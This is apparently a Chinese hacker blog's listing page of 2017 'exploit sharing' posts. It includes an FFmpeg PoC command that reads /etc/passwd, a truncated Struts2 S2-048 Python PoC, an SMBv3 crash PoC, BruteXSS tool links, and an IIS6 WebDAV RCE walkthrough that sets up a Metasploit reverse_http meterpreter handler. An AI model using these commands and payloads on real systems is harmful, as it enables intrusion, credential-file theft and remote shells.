记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

FFmpeg文件读取漏洞(CVE-2017-9993)

影响范围 3.2.2 3.2.5 3.1.2 2.6.8   poc:https://github.com/neex/ffmpeg-avi-m3u-xbin   python gen_xbin_avi.py file:///etc/passwd passwd.avi   这时候会在目录下生成一个文件,上传该文件到网站上面     点击播放就可以直接执行系统命令
发布时间:2017-11-18 23:20 | 阅读:164562 | 评论:0 | 标签:Exp分享 漏洞

BruteXSS:XSS暴力破解神器

英文原版下载地址:github地址:https://github.com/ym2011/penetration/tree/master/BruteXSS 汉化版下载地址:http://files.cnblogs.com/files/Pitcoft/Brutexss(%E6%B1%89%E5%8C%96%E6%94%B9%E8%BF%9B).zip //kali下使用汉化版的会乱码。
发布时间:2017-07-14 02:50 | 阅读:213922 | 评论:0 | 标签:Exp分享 xss 暴力破解

CVE-2017-0016 Windows下SMBv3拒绝响应服务可致BSOD

受影响系统:Win Server 2012/2016、Win10/Win8/8.1 攻击系统 kali linux  ip   被攻击系统win10 ip:   接下来在攻击系统kali linux中运行poc   被攻击系统,只要访问了查看共享文件就会蓝屏 //192.168.224.129   点我下载poc: 2017071301563087
发布时间:2017-07-13 09:55 | 阅读:115315 | 评论:0 | 标签:Exp分享

Struts2(S2-048)漏洞POC

#!/usr/bin/python   #coding=utf-8   ''' s2-048 poc ''' import urllib   import urllib2      def post(url, data):       req = urllib2.Request(url)       data = urllib.urlencode(data)       #enable cookie       opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())       response = opener.open(req, data)    
发布时间:2017-07-09 04:25 | 阅读:138266 | 评论:0 | 标签:Exp分享 漏洞

Win32k.sys’本地权限提升漏洞(CVE-2016-7246)(MS16-135)

受影响系统: Microsoft Windows Server 2016 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2012 Microsoft Windows Server 2008 R2 Microsoft Windows RT 8.1 Microsoft Windows 8.1 Microsoft Windows 7 Microsoft Windows 10 漏洞详情 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后
发布时间:2017-04-09 21:15 | 阅读:162743 | 评论:0 | 标签:Exp分享 漏洞

(CVE-2017-7269)iis6远程代码执行漏洞详细分析

作者:墨魂 poc:https://www.exploit-db.com/exploits/41738/ //我们博客之前发的有http://www.0-sec.org/2017/03/28/cve-2017-7269iis6远程代码执行漏洞/   利用条件是目标iis6.0 并且开启了webdav 我们测试的目标是:192.168.2.137   这样说明是可以利用的 kali的ip是:192.168.2.131   msf > use exploit/multi/handler msf>exploit(handler)  > set payload windows/meterpreter/reverse_http payload => window
发布时间:2017-04-04 04:55 | 阅读:596283 | 评论:0 | 标签:Exp分享 安全文章 漏洞

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云